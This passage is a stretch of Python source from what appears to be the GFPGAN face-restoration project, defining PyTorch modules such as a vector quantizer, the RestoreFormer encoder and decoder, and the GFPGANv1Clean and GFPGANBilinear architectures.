Inputs: - n_e : number of embeddings - e_dim : dimension of embedding - beta : commitment cost used in loss term, beta * ||z_e(x)-sg[e]||^2 _____________________________________________ """ def __init__(self, n_e, e_dim, beta): super(VectorQuantizer, self).__init__() self.n_e = n_e self.e_dim = e_dim self.beta = beta self.embedding = nn.Embedding(self.n_e, self.e_dim) self.embedding.weight.data.uniform_(-1.0 / self.n_e, 1.0 / self.n_e) def forward(self, z): """ Inputs the output of the encoder network z and maps it to a discrete one-hot vector that is the index of the closest embedding vector e_j z (continuous) -> z_q (discrete) z.shape = (batch, channel, height, width) quantization pipeline: 1. get encoder input (B,C,H,W) 2. flatten input to (B*H*W,C) """ # reshape z -> (batch, height, width, channel) and flatten z = z.permute(0, 2, 3, 1).contiguous() z_flattened = z.view(-1, self.e_dim) # distances from z to embeddings e_j (z - e)^2 = z^2 + e^2 - 2 e * z d = torch.sum(z_flattened ** 2, dim=1, keepdim=True) + \ torch.sum(self.embedding.weight**2, dim=1) - 2 * \ torch.matmul(z_flattened, self.embedding.weight.t()) # could possible replace this here # #\start... # find closest encodings min_value, min_encoding_indices = torch.min(d, dim=1) min_encoding_indices = min_encoding_indices.unsqueeze(1) min_encodings = torch.zeros(min_encoding_indices.shape[0], self.n_e).to(z) min_encodings.scatter_(1, min_encoding_indices, 1) # dtype min encodings: torch.float32 # min_encodings shape: torch.Size([2048, 512]) # min_encoding_indices.shape: torch.Size([2048, 1]) # get quantized latent vectors z_q = torch.matmul(min_encodings, self.embedding.weight).view(z.shape) # .........\end # with: # .........\start # min_encoding_indices = torch.argmin(d, dim=1) # z_q = self.embedding(min_encoding_indices) # ......\end......... (TODO) # compute loss for embedding loss = torch.mean((z_q.detach() - z)**2) + self.beta * torch.mean((z_q - z.detach())**2) # preserve gradients z_q = z + (z_q - z).detach() # perplexity e_mean = torch.mean(min_encodings, dim=0) perplexity = torch.exp(-torch.sum(e_mean * torch.log(e_mean + 1e-10))) # reshape back to match original input shape z_q = z_q.permute(0, 3, 1, 2).contiguous() return z_q, loss, (perplexity, min_encodings, min_encoding_indices, d) def get_codebook_entry(self, indices, shape): # shape specifying (batch, height, width, channel) # TODO: check for more easy handling with nn.Embedding min_encodings = torch.zeros(indices.shape[0], self.n_e).to(indices) min_encodings.scatter_(1, indices[:, None], 1) # get quantized latent vectors z_q = torch.matmul(min_encodings.float(), self.embedding.weight) if shape is not None: z_q = z_q.view(shape) # reshape back to match original input shape z_q = z_q.permute(0, 3, 1, 2).contiguous() return z_q # pytorch_diffusion + derived encoder decoder def nonlinearity(x): # swish return x * torch.sigmoid(x) def Normalize(in_channels): return torch.nn.GroupNorm(num_groups=32, num_channels=in_channels, eps=1e-6, affine=True) class Upsample(nn.Module): def __init__(self, in_channels, with_conv): super().__init__() self.with_conv = with_conv if self.with_conv: self.conv = torch.nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1) def forward(self, x): x = torch.nn.functional.interpolate(x, scale_factor=2.0, mode='nearest') if self.with_conv: x = self.conv(x) return x class Downsample(nn.Module): def __init__(self, in_channels, with_conv): super().__init__() self.with_conv = with_conv if self.with_conv: # no asymmetric padding in torch conv, must do it ourselves self.conv = torch.nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=2, padding=0) def forward(self, x): if self.with_conv: pad = (0, 1, 0, 1) x = torch.nn.functional.pad(x, pad, mode='constant', value=0) x = self.conv(x) else: x = torch.nn.functional.avg_pool2d(x, kernel_size=2, stride=2) return x class ResnetBlock(nn.Module): def __init__(self, *, in_channels, out_channels=None, conv_shortcut=False, dropout, temb_channels=512): super().__init__() self.in_channels = in_channels out_channels = in_channels if out_channels is None else out_channels self.out_channels = out_channels self.use_conv_shortcut = conv_shortcut self.norm1 = Normalize(in_channels) self.conv1 = torch.nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1) if temb_channels > 0: self.temb_proj = torch.nn.Linear(temb_channels, out_channels) self.norm2 = Normalize(out_channels) self.dropout = torch.nn.Dropout(dropout) self.conv2 = torch.nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1) if self.in_channels != self.out_channels: if self.use_conv_shortcut: self.conv_shortcut = torch.nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1) else: self.nin_shortcut = torch.nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0) def forward(self, x, temb): h = x h = self.norm1(h) h = nonlinearity(h) h = self.conv1(h) if temb is not None: h = h + self.temb_proj(nonlinearity(temb))[:, :, None, None] h = self.norm2(h) h = nonlinearity(h) h = self.dropout(h) h = self.conv2(h) if self.in_channels != self.out_channels: if self.use_conv_shortcut: x = self.conv_shortcut(x) else: x = self.nin_shortcut(x) return x + h class MultiHeadAttnBlock(nn.Module): def __init__(self, in_channels, head_size=1): super().__init__() self.in_channels = in_channels self.head_size = head_size self.att_size = in_channels // head_size assert (in_channels % head_size == 0), 'The size of head should be divided by the number of channels.' self.norm1 = Normalize(in_channels) self.norm2 = Normalize(in_channels) self.q = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.k = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.v = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.proj_out = torch.nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0) self.num = 0 def forward(self, x, y=None): h_ = x h_ = self.norm1(h_) if y is None: y = h_ else: y = self.norm2(y) q = self.q(y) k = self.k(h_) v = self.v(h_) # compute attention b, c, h, w = q.shape q = q.reshape(b, self.head_size, self.att_size, h * w) q = q.permute(0, 3, 1, 2) # b, hw, head, att k = k.reshape(b, self.head_size, self.att_size, h * w) k = k.permute(0, 3, 1, 2) v = v.reshape(b, self.head_size, self.att_size, h * w) v = v.permute(0, 3, 1, 2) q = q.transpose(1, 2) v = v.transpose(1, 2) k = k.transpose(1, 2).transpose(2, 3) scale = int(self.att_size)**(-0.5) q.mul_(scale) w_ = torch.matmul(q, k) w_ = F.softmax(w_, dim=3) w_ = w_.matmul(v) w_ = w_.transpose(1, 2).contiguous() # [b, h*w, head, att] w_ = w_.view(b, h, w, -1) w_ = w_.permute(0, 3, 1, 2) w_ = self.proj_out(w_) return x + w_ class MultiHeadEncoder(nn.Module): def __init__(self, ch, out_ch, ch_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, resamp_with_conv=True, in_channels=3, resolution=512, z_channels=256, double_z=True, enable_mid=True, head_size=1, **ignore_kwargs): super().__init__() self.ch = ch self.temb_ch = 0 self.num_resolutions = len(ch_mult) self.num_res_blocks = num_res_blocks self.resolution = resolution self.in_channels = in_channels self.enable_mid = enable_mid # downsampling self.conv_in = torch.nn.Conv2d(in_channels, self.ch, kernel_size=3, stride=1, padding=1) curr_res = resolution in_ch_mult = (1, ) + tuple(ch_mult) self.down = nn.ModuleList() for i_level in range(self.num_resolutions): block = nn.ModuleList() attn = nn.ModuleList() block_in = ch * in_ch_mult[i_level] block_out = ch * ch_mult[i_level] for i_block in range(self.num_res_blocks): block.append( ResnetBlock( in_channels=block_in, out_channels=block_out, temb_channels=self.temb_ch, dropout=dropout)) block_in = block_out if curr_res in attn_resolutions: attn.append(MultiHeadAttnBlock(block_in, head_size)) down = nn.Module() down.block = block down.attn = attn if i_level != self.num_resolutions - 1: down.downsample = Downsample(block_in, resamp_with_conv) curr_res = curr_res // 2 self.down.append(down) # middle if self.enable_mid: self.mid = nn.Module() self.mid.block_1 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) self.mid.attn_1 = MultiHeadAttnBlock(block_in, head_size) self.mid.block_2 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) # end self.norm_out = Normalize(block_in) self.conv_out = torch.nn.Conv2d( block_in, 2 * z_channels if double_z else z_channels, kernel_size=3, stride=1, padding=1) def forward(self, x): hs = {} # timestep embedding temb = None # downsampling h = self.conv_in(x) hs['in'] = h for i_level in range(self.num_resolutions): for i_block in range(self.num_res_blocks): h = self.down[i_level].block[i_block](h, temb) if len(self.down[i_level].attn) > 0: h = self.down[i_level].attn[i_block](h) if i_level != self.num_resolutions - 1: # hs.append(h) hs['block_' + str(i_level)] = h h = self.down[i_level].downsample(h) # middle # h = hs[-1] if self.enable_mid: h = self.mid.block_1(h, temb) hs['block_' + str(i_level) + '_atten'] = h h = self.mid.attn_1(h) h = self.mid.block_2(h, temb) hs['mid_atten'] = h # end h = self.norm_out(h) h = nonlinearity(h) h = self.conv_out(h) # hs.append(h) hs['out'] = h return hs class MultiHeadDecoder(nn.Module): def __init__(self, ch, out_ch, ch_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, resamp_with_conv=True, in_channels=3, resolution=512, z_channels=256, give_pre_end=False, enable_mid=True, head_size=1, **ignorekwargs): super().__init__() self.ch = ch self.temb_ch = 0 self.num_resolutions = len(ch_mult) self.num_res_blocks = num_res_blocks self.resolution = resolution self.in_channels = in_channels self.give_pre_end = give_pre_end self.enable_mid = enable_mid # compute in_ch_mult, block_in and curr_res at lowest res block_in = ch * ch_mult[self.num_resolutions - 1] curr_res = resolution // 2**(self.num_resolutions - 1) self.z_shape = (1, z_channels, curr_res, curr_res) print('Working with z of shape {} = {} dimensions.'.format(self.z_shape, np.prod(self.z_shape))) # z to block_in self.conv_in = torch.nn.Conv2d(z_channels, block_in, kernel_size=3, stride=1, padding=1) # middle if self.enable_mid: self.mid = nn.Module() self.mid.block_1 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) self.mid.attn_1 = MultiHeadAttnBlock(block_in, head_size) self.mid.block_2 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) # upsampling self.up = nn.ModuleList() for i_level in reversed(range(self.num_resolutions)): block = nn.ModuleList() attn = nn.ModuleList() block_out = ch * ch_mult[i_level] for i_block in range(self.num_res_blocks + 1): block.append( ResnetBlock( in_channels=block_in, out_channels=block_out, temb_channels=self.temb_ch, dropout=dropout)) block_in = block_out if curr_res in attn_resolutions: attn.append(MultiHeadAttnBlock(block_in, head_size)) up = nn.Module() up.block = block up.attn = attn if i_level != 0: up.upsample = Upsample(block_in, resamp_with_conv) curr_res = curr_res * 2 self.up.insert(0, up) # prepend to get consistent order # end self.norm_out = Normalize(block_in) self.conv_out = torch.nn.Conv2d(block_in, out_ch, kernel_size=3, stride=1, padding=1) def forward(self, z): # assert z.shape[1:] == self.z_shape[1:] self.last_z_shape = z.shape # timestep embedding temb = None # z to block_in h = self.conv_in(z) # middle if self.enable_mid: h = self.mid.block_1(h, temb) h = self.mid.attn_1(h) h = self.mid.block_2(h, temb) # upsampling for i_level in reversed(range(self.num_resolutions)): for i_block in range(self.num_res_blocks + 1): h = self.up[i_level].block[i_block](h, temb) if len(self.up[i_level].attn) > 0: h = self.up[i_level].attn[i_block](h) if i_level != 0: h = self.up[i_level].upsample(h) # end if self.give_pre_end: return h h = self.norm_out(h) h = nonlinearity(h) h = self.conv_out(h) return h class MultiHeadDecoderTransformer(nn.Module): def __init__(self, ch, out_ch, ch_mult=(1, 2, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, resamp_with_conv=True, in_channels=3, resolution=512, z_channels=256, give_pre_end=False, enable_mid=True, head_size=1, **ignorekwargs): super().__init__() self.ch = ch self.temb_ch = 0 self.num_resolutions = len(ch_mult) self.num_res_blocks = num_res_blocks self.resolution = resolution self.in_channels = in_channels self.give_pre_end = give_pre_end self.enable_mid = enable_mid # compute in_ch_mult, block_in and curr_res at lowest res block_in = ch * ch_mult[self.num_resolutions - 1] curr_res = resolution // 2**(self.num_resolutions - 1) self.z_shape = (1, z_channels, curr_res, curr_res) print('Working with z of shape {} = {} dimensions.'.format(self.z_shape, np.prod(self.z_shape))) # z to block_in self.conv_in = torch.nn.Conv2d(z_channels, block_in, kernel_size=3, stride=1, padding=1) # middle if self.enable_mid: self.mid = nn.Module() self.mid.block_1 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) self.mid.attn_1 = MultiHeadAttnBlock(block_in, head_size) self.mid.block_2 = ResnetBlock( in_channels=block_in, out_channels=block_in, temb_channels=self.temb_ch, dropout=dropout) # upsampling self.up = nn.ModuleList() for i_level in reversed(range(self.num_resolutions)): block = nn.ModuleList() attn = nn.ModuleList() block_out = ch * ch_mult[i_level] for i_block in range(self.num_res_blocks + 1): block.append( ResnetBlock( in_channels=block_in, out_channels=block_out, temb_channels=self.temb_ch, dropout=dropout)) block_in = block_out if curr_res in attn_resolutions: attn.append(MultiHeadAttnBlock(block_in, head_size)) up = nn.Module() up.block = block up.attn = attn if i_level != 0: up.upsample = Upsample(block_in, resamp_with_conv) curr_res = curr_res * 2 self.up.insert(0, up) # prepend to get consistent order # end self.norm_out = Normalize(block_in) self.conv_out = torch.nn.Conv2d(block_in, out_ch, kernel_size=3, stride=1, padding=1) def forward(self, z, hs): # assert z.shape[1:] == self.z_shape[1:] # self.last_z_shape = z.shape # timestep embedding temb = None # z to block_in h = self.conv_in(z) # middle if self.enable_mid: h = self.mid.block_1(h, temb) h = self.mid.attn_1(h, hs['mid_atten']) h = self.mid.block_2(h, temb) # upsampling for i_level in reversed(range(self.num_resolutions)): for i_block in range(self.num_res_blocks + 1): h = self.up[i_level].block[i_block](h, temb) if len(self.up[i_level].attn) > 0: h = self.up[i_level].attn[i_block](h, hs['block_' + str(i_level) + '_atten']) # hfeature = h.clone() if i_level != 0: h = self.up[i_level].upsample(h) # end if self.give_pre_end: return h h = self.norm_out(h) h = nonlinearity(h) h = self.conv_out(h) return h class RestoreFormer(nn.Module): def __init__(self, n_embed=1024, embed_dim=256, ch=64, out_ch=3, ch_mult=(1, 2, 2, 4, 4, 8), num_res_blocks=2, attn_resolutions=(16, ), dropout=0.0, in_channels=3, resolution=512, z_channels=256, double_z=False, enable_mid=True, fix_decoder=False, fix_codebook=True, fix_encoder=False, head_size=8): super(RestoreFormer, self).__init__() self.encoder = MultiHeadEncoder( ch=ch, out_ch=out_ch, ch_mult=ch_mult, num_res_blocks=num_res_blocks, attn_resolutions=attn_resolutions, dropout=dropout, in_channels=in_channels, resolution=resolution, z_channels=z_channels, double_z=double_z, enable_mid=enable_mid, head_size=head_size) self.decoder = MultiHeadDecoderTransformer( ch=ch, out_ch=out_ch, ch_mult=ch_mult, num_res_blocks=num_res_blocks, attn_resolutions=attn_resolutions, dropout=dropout, in_channels=in_channels, resolution=resolution, z_channels=z_channels, enable_mid=enable_mid, head_size=head_size) self.quantize = VectorQuantizer(n_embed, embed_dim, beta=0.25) self.quant_conv = torch.nn.Conv2d(z_channels, embed_dim, 1) self.post_quant_conv = torch.nn.Conv2d(embed_dim, z_channels, 1) if fix_decoder: for _, param in self.decoder.named_parameters(): param.requires_grad = False for _, param in self.post_quant_conv.named_parameters(): param.requires_grad = False for _, param in self.quantize.named_parameters(): param.requires_grad = False elif fix_codebook: for _, param in self.quantize.named_parameters(): param.requires_grad = False if fix_encoder: for _, param in self.encoder.named_parameters(): param.requires_grad = False def encode(self, x): hs = self.encoder(x) h = self.quant_conv(hs['out']) quant, emb_loss, info = self.quantize(h) return quant, emb_loss, info, hs def decode(self, quant, hs): quant = self.post_quant_conv(quant) dec = self.decoder(quant, hs) return dec def forward(self, input, **kwargs): quant, diff, info, hs = self.encode(input) dec = self.decode(quant, hs) return dec, None File: gfpgan/archs/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import arch modules for registry # scan all the files that end with '_arch.py' under the archs folder arch_folder = osp.dirname(osp.abspath(__file__)) arch_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(arch_folder) if v.endswith('_arch.py')] # import all the arch modules _arch_modules = [importlib.import_module(f'gfpgan.archs.{file_name}') for file_name in arch_filenames] File: gfpgan/archs/gfpganv1_clean_arch.py import math import random import torch from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F from .stylegan2_clean_arch import StyleGAN2GeneratorClean class StyleGAN2GeneratorCSFT(StyleGAN2GeneratorClean): """StyleGAN2 Generator with SFT modulation (Spatial Feature Transform). It is the clean version without custom compiled CUDA extensions used in StyleGAN2. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, narrow=1, sft_half=False): super(StyleGAN2GeneratorCSFT, self).__init__( out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, narrow=narrow) self.sft_half = sft_half def forward(self, styles, conditions, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorCSFT. Args: styles (list[Tensor]): Sample codes of styles. conditions (list[Tensor]): SFT conditions to generators. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): The truncation ratio. Default: 1. truncation_latent (Tensor | None): The truncation latent tensor. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. """ # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latents with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) # the conditions may have fewer levels if i < len(conditions): # SFT part to combine the conditions if self.sft_half: # only apply SFT to half of the channels out_same, out_sft = torch.split(out, int(out.size(1) // 2), dim=1) out_sft = out_sft * conditions[i - 1] + conditions[i] out = torch.cat([out_same, out_sft], dim=1) else: # apply SFT to all the channels out = out * conditions[i - 1] + conditions[i] out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) # feature back to the rgb space i += 2 image = skip if return_latents: return image, latent else: return image, None class ResBlock(nn.Module): """Residual block with bilinear upsampling/downsampling. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. mode (str): Upsampling/downsampling mode. Options: down | up. Default: down. """ def __init__(self, in_channels, out_channels, mode='down'): super(ResBlock, self).__init__() self.conv1 = nn.Conv2d(in_channels, in_channels, 3, 1, 1) self.conv2 = nn.Conv2d(in_channels, out_channels, 3, 1, 1) self.skip = nn.Conv2d(in_channels, out_channels, 1, bias=False) if mode == 'down': self.scale_factor = 0.5 elif mode == 'up': self.scale_factor = 2 def forward(self, x): out = F.leaky_relu_(self.conv1(x), negative_slope=0.2) # upsample/downsample out = F.interpolate(out, scale_factor=self.scale_factor, mode='bilinear', align_corners=False) out = F.leaky_relu_(self.conv2(out), negative_slope=0.2) # skip x = F.interpolate(x, scale_factor=self.scale_factor, mode='bilinear', align_corners=False) skip = self.skip(x) out = out + skip return out @ARCH_REGISTRY.register() class GFPGANv1Clean(nn.Module): """The GFPGAN architecture: Unet + StyleGAN2 decoder with SFT. It is the clean version without custom compiled CUDA extensions used in StyleGAN2. Ref: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. decoder_load_path (str): The path to the pre-trained decoder model (usually, the StyleGAN2). Default: None. fix_decoder (bool): Whether to fix the decoder. Default: True. num_mlp (int): Layer number of MLP style layers. Default: 8. input_is_latent (bool): Whether input is latent style. Default: False. different_w (bool): Whether to use different latent w for different layers. Default: False. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__( self, out_size, num_style_feat=512, channel_multiplier=1, decoder_load_path=None, fix_decoder=True, # for stylegan decoder num_mlp=8, input_is_latent=False, different_w=False, narrow=1, sft_half=False): super(GFPGANv1Clean, self).__init__() self.input_is_latent = input_is_latent self.different_w = different_w self.num_style_feat = num_style_feat unet_narrow = narrow * 0.5 # by default, use a half of input channels channels = { '4': int(512 * unet_narrow), '8': int(512 * unet_narrow), '16': int(512 * unet_narrow), '32': int(512 * unet_narrow), '64': int(256 * channel_multiplier * unet_narrow), '128': int(128 * channel_multiplier * unet_narrow), '256': int(64 * channel_multiplier * unet_narrow), '512': int(32 * channel_multiplier * unet_narrow), '1024': int(16 * channel_multiplier * unet_narrow) } self.log_size = int(math.log(out_size, 2)) first_out_size = 2**(int(math.log(out_size, 2))) self.conv_body_first = nn.Conv2d(3, channels[f'{first_out_size}'], 1) # downsample in_channels = channels[f'{first_out_size}'] self.conv_body_down = nn.ModuleList() for i in range(self.log_size, 2, -1): out_channels = channels[f'{2**(i - 1)}'] self.conv_body_down.append(ResBlock(in_channels, out_channels, mode='down')) in_channels = out_channels self.final_conv = nn.Conv2d(in_channels, channels['4'], 3, 1, 1) # upsample in_channels = channels['4'] self.conv_body_up = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.conv_body_up.append(ResBlock(in_channels, out_channels, mode='up')) in_channels = out_channels # to RGB self.toRGB = nn.ModuleList() for i in range(3, self.log_size + 1): self.toRGB.append(nn.Conv2d(channels[f'{2**i}'], 3, 1)) if different_w: linear_out_channel = (int(math.log(out_size, 2)) * 2 - 2) * num_style_feat else: linear_out_channel = num_style_feat self.final_linear = nn.Linear(channels['4'] * 4 * 4, linear_out_channel) # the decoder: stylegan2 generator with SFT modulations self.stylegan_decoder = StyleGAN2GeneratorCSFT( out_size=out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, narrow=narrow, sft_half=sft_half) # load pre-trained stylegan2 model if necessary if decoder_load_path: self.stylegan_decoder.load_state_dict( torch.load(decoder_load_path, map_location=lambda storage, loc: storage)['params_ema']) # fix decoder without updating params if fix_decoder: for _, param in self.stylegan_decoder.named_parameters(): param.requires_grad = False # for SFT modulations (scale and shift) self.condition_scale = nn.ModuleList() self.condition_shift = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] if sft_half: sft_out_channels = out_channels else: sft_out_channels = out_channels * 2 self.condition_scale.append( nn.Sequential( nn.Conv2d(out_channels, out_channels, 3, 1, 1), nn.LeakyReLU(0.2, True), nn.Conv2d(out_channels, sft_out_channels, 3, 1, 1))) self.condition_shift.append( nn.Sequential( nn.Conv2d(out_channels, out_channels, 3, 1, 1), nn.LeakyReLU(0.2, True), nn.Conv2d(out_channels, sft_out_channels, 3, 1, 1))) def forward(self, x, return_latents=False, return_rgb=True, randomize_noise=True, **kwargs): """Forward function for GFPGANv1Clean. Args: x (Tensor): Input images. return_latents (bool): Whether to return style latents. Default: False. return_rgb (bool): Whether return intermediate rgb images. Default: True. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. """ conditions = [] unet_skips = [] out_rgbs = [] # encoder feat = F.leaky_relu_(self.conv_body_first(x), negative_slope=0.2) for i in range(self.log_size - 2): feat = self.conv_body_down[i](feat) unet_skips.insert(0, feat) feat = F.leaky_relu_(self.final_conv(feat), negative_slope=0.2) # style code style_code = self.final_linear(feat.view(feat.size(0), -1)) if self.different_w: style_code = style_code.view(style_code.size(0), -1, self.num_style_feat) # decode for i in range(self.log_size - 2): # add unet skip feat = feat + unet_skips[i] # ResUpLayer feat = self.conv_body_up[i](feat) # generate scale and shift for SFT layers scale = self.condition_scale[i](feat) conditions.append(scale.clone()) shift = self.condition_shift[i](feat) conditions.append(shift.clone()) # generate rgb images if return_rgb: out_rgbs.append(self.toRGB[i](feat)) # decoder image, _ = self.stylegan_decoder([style_code], conditions, return_latents=return_latents, input_is_latent=self.input_is_latent, randomize_noise=randomize_noise) return image, out_rgbs File: gfpgan/archs/gfpgan_bilinear_arch.py import math import random import torch from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from .gfpganv1_arch import ResUpBlock from .stylegan2_bilinear_arch import (ConvLayer, EqualConv2d, EqualLinear, ResBlock, ScaledLeakyReLU, StyleGAN2GeneratorBilinear) class StyleGAN2GeneratorBilinearSFT(StyleGAN2GeneratorBilinear): """StyleGAN2 Generator with SFT modulation (Spatial Feature Transform). It is the bilinear version. It does not use the complicated UpFirDnSmooth function that is not friendly for deployment. It can be easily converted to the clean version: StyleGAN2GeneratorCSFT. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, lr_mlp=0.01, narrow=1, sft_half=False): super(StyleGAN2GeneratorBilinearSFT, self).__init__( out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, lr_mlp=lr_mlp, narrow=narrow) self.sft_half = sft_half def forward(self, styles, conditions, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2GeneratorBilinearSFT. Args: styles (list[Tensor]): Sample codes of styles. conditions (list[Tensor]): SFT conditions to generators. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): The truncation ratio. Default: 1. truncation_latent (Tensor | None): The truncation latent tensor. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. """ # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latents with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) # the conditions may have fewer levels if i < len(conditions): # SFT part to combine the conditions if self.sft_half: # only apply SFT to half of the channels out_same, out_sft = torch.split(out, int(out.size(1) // 2), dim=1) out_sft = out_sft * conditions[i - 1] + conditions[i] out = torch.cat([out_same, out_sft], dim=1) else: # apply SFT to all the channels out = out * conditions[i - 1] + conditions[i] out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) # feature back to the rgb space i += 2 image = skip if return_latents: return image, latent else: return image, None @ARCH_REGISTRY.register() class GFPGANBilinear(nn.Module): """The GFPGAN architecture: Unet + StyleGAN2 decoder with SFT. It is the bilinear version and it does not use the complicated UpFirDnSmooth function that is not friendly for deployment. It can be easily converted to the clean version: GFPGANv1Clean. Ref: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. decoder_load_path (str): The path to the pre-trained decoder model (usually, the StyleGAN2). Default: None. fix_decoder (bool): Whether to fix the decoder. Default: True. num_mlp (int): Layer number of MLP style layers. Default: 8. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. input_is_latent (bool): Whether input is latent style. Default: False. different_w (bool): Whether to use different latent w for different layers. Default: False. narrow (float): The narrow ratio for channels. Default: 1. sft_half (bool): Whether to apply SFT on half of the input channels. Default: False. """ def __init__( self, out_size, num_style_feat=512, channel_multiplier=1, decoder_load_path=None, fix_decoder=True, # for stylegan decoder 